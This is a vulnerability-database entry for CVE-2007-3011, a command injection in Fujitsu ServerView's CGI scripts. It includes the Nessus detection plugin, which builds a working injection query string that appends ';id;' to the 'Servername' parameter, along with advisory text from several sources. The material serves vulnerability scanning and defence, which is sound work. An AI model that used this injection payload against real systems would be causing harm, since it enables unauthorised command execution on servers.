Vulnerabilities > CVE-2007-3011 - Remote Command Execution vulnerability in Fujitsu ServerView DBASCIIAccess

CVSS 7.5 - HIGH
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
PARTIAL
Availability impact
PARTIAL
network
low complexity
fujitsu
nessus
exploit available

Summary

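The DBAsciiAccess CGI Script in the web interface in Fujitsu-Siemens Computers ServerView before 4.50.09 allows remote attackers to execute arbitrary commands via shell metacharacters in the Servername subparameter of the ParameterList parameter. The Nessus plugin listed below reports that the 'Servername' parameter of the 'SnmpView/SnmpListMibValues' script is affected in the same way, so both scripts should be treated as exposed on versions before 4.50.09.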

Exploit-Db

description: Fujitsu ServerView 4.50.8 DBASCIIAccess Remote Command Execution Vulnerability. CVE-2007-3011. Remote exploits for multiple platforms
id: EDB-ID:30264
last seen: 2016-02-03
modified: 2007-07-03
published: 2007-07-03
reporter: RedTeam Pentesting GmbH
source: https://www.exploit-db.com/download/30264/
title: Fujitsu ServerView <= 4.50.8 DBASCIIAccess Remote Command Execution Vulnerability

Nessus

NASL family: CGI abuses
NASL id: SERVERVIEW_SERVERNAME_CMD_EXEC.NASL
description: The remote host is running ServerView, a web-based suite of asset management tools. The version of ServerView installed on the remote host fails to sanitize user-supplied input to the 'Servername' parameter of the 'SnmpView/SnmpListMibValues' script before using it to execute a shell command.
last seen: 2020-06-01
modified: 2020-06-02
plugin id: 25672
published: 2007-07-06
reporter: This script is Copyright (C) 2007-2018 Tenable Network Security, Inc.
source: https://www.tenable.com/plugins/nessus/25672
title: ServerView Servername Parameter Arbitrary Command Execution
code
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

# Registration section: when the engine loads the plugin with 'description'
# set, only the metadata below is declared and the script exits at the end of
# this block, before any request is built.
if (description)
{
  script_id(25672);
  script_version("1.14");

  # Public identifiers for the issue this plugin reports.
  script_cve_id("CVE-2007-3011");
  script_bugtraq_id(24762);

  script_name(english:"ServerView Servername Parameter Arbitrary Command Execution");
  script_summary(english:"Tries to run a command via ServerView's SnmpListMibValues script");

 # Report text shown with a finding. The description names two entry points
 # for the same unsanitized value: 'Servername' on SnmpView/SnmpListMibValues
 # (the one this plugin tests) and the 'ServerName' subparameter of
 # 'Parameterlist' on DBAsciiAccess. A negative result here therefore says
 # nothing about whether DBAsciiAccess is separately filtered or blocked.
 script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a CGI script that allows arbitrary
command execution." );
 script_set_attribute(attribute:"description", value:
"The remote host is running ServerView, a web-based suite of asset
management tools. 

The version of ServerView installed on the remote host fails to
sanitize user-supplied input to the 'Servername' parameter of the
'SnmpView/SnmpListMibValues' script before using it to execute a shell
command.  An unauthenticated attacker can leverage this issue to
execute arbitrary code on the remote host subject to the privileges of
the web server user id. 

Note that the same result can be achieved via input to the
'ServerName' subparameter of the 'Parameterlist' parameter of the
'DBAsciiAccess' script." );
 script_set_attribute(attribute:"see_also", value:"https://www.securityfocus.com/archive/1/472800/30/0/threaded" );
 # Remediation recorded by the plugin: the fixed release is 4.50.09.
 script_set_attribute(attribute:"solution", value:
"Upgrade to ServerView version 4.50.09 as that reportedly fixes the
issue." );
 # CVSS v2 base vector: network reachable (AV:N), low complexity (AC:L),
 # no authentication (Au:N), partial impact on C/I/A.
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
 # CVSS v2 temporal vector: proof-of-concept exploitability (E:POC),
 # official fix available (RL:OF), report confirmed (RC:C).
 script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
 # NOTE(review): "exploit_available" is "false" while the temporal vector
 # above carries E:POC and "exploitability_ease" says no exploit is required.
 # Do not rely on this attribute alone when prioritising the finding.
 script_set_attribute(attribute:"exploit_available", value:"false");
 script_set_attribute(attribute:"plugin_publication_date", value: "2007/07/06");
 script_set_attribute(attribute:"vuln_publication_date", value: "2007/07/05");
 script_cvs_date("Date: 2018/11/15 20:50:18");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_set_attribute(attribute:"cpe", value:"cpe:/a:fujitsu:serverview");
 script_end_attributes();

  # ACT_ATTACK: the finding is confirmed by sending a live request that makes
  # the target run a command, not by matching a version string.
  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2007-2018 Tenable Network Security, Inc.");

  # Scheduling constraints: runs after http_version.nasl, is skipped when the
  # "Settings/disable_cgi_scanning" key is set, and targets ports registered
  # as web services (or port 80).
  script_dependencies("http_version.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  # Registration ends here; nothing after this block runs in description mode.
  exit(0);
}

include("global_settings.inc");
include("misc_func.inc");
include("http.inc");

# Web port to test; falls back to 80 when no other port is supplied.
port = get_http_port(default:80);

# Try to exploit the issue to run a command.
#
# The probe command is "id". It is appended to the 'Servername' value between
# semicolons, and a response containing uid=/gid= output (the check_result
# pattern below) is taken as proof that the value reached a shell unfiltered.
#
# For defenders: the request produced here is a GET to
# /ServerView/SnmpView/SnmpListMibValues whose query string carries a
# 'Servername' value containing ';'. That is the pattern to search for in web
# server access logs, and the input the CGI script must reject. The plugin's
# stated fix is an upgrade to ServerView 4.50.09.
cmd = "id";
exploit = string(
  "SSL=&",
  "Server=", get_host_ip(), "&",
  "ThisApplication=TestConnectivityFirst&",
  "ServerName=bcmes&",
  "Servername=127.0.0.1;", cmd, ";,SType--Server&",
  "ParameterList=What--primary,,OtherCommunity--{{OtherCommunity}},,SecondIP--,,Timeout--5,,Community--public,,SType--,,ASPresent--1"
);

# http_check_remote_code() comes from an included library and is not shown
# here; presumably it sends check_request to 'port' and reports the finding
# when the response matches check_result. Confirm against the library.
http_check_remote_code(
  check_request : string("/ServerView/SnmpView/SnmpListMibValues?", exploit),
  check_result  : "uid=[0-9]+.*gid=[0-9]+.*",
  command       : cmd,
  port          : port
);

Packetstorm

data source: https://packetstormsecurity.com/files/download/57499/fujitsu-serverview-exec.txt
id: PACKETSTORM:57499
last seen: 2016-12-05
published: 2007-07-07
reporter: redteam-pentesting.de
source: https://packetstormsecurity.com/files/57499/fujitsu-serverview-exec.txt.html
title: fujitsu-serverview-exec.txt

Seebug

bulletinFamily: exploit
description: BUGTRAQ ID: 24762 CVE(CAN) ID: CVE-2007-3011 ServerView是用于进行自动分析和版本维护的资产管理工具。 ServerView的Web接口处理用户数据时存在输入验证漏洞,远程攻击者可能利用此漏洞在服务器上以Web进程的权限执行任意命令。 DBAsciiAccess CGI脚本提供了ping功能,该脚本Parameterlist参数的Servername子参数给出了所要ping的IP地址,但没有对这个IP地址执行任何检查。如果在IP后添加了拖尾分号,攻击者就可以注入任意shell命令并以Web服务器进程的权限执行。 Fujitsu ServerView < 4.50.09 临时解决方法: * 禁止不可信任用户访问ServerView的Web接口。 厂商补丁: Fujitsu ------- 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: http://support.fujitsu-siemens.com/Download/ShowDescription.asp?SoftwareGUID=D1ED76B7-FB37-4375-8744-8E6D5CFDC87F
id: SSV:1970
last seen: 2017-11-19
modified: 2007-07-05
published: 2007-07-05
reporter: Root
source: https://www.seebug.org/vuldb/ssvid-1970
title: Fujitsu ServerView DBASCIIAccess脚本远程代码执行漏洞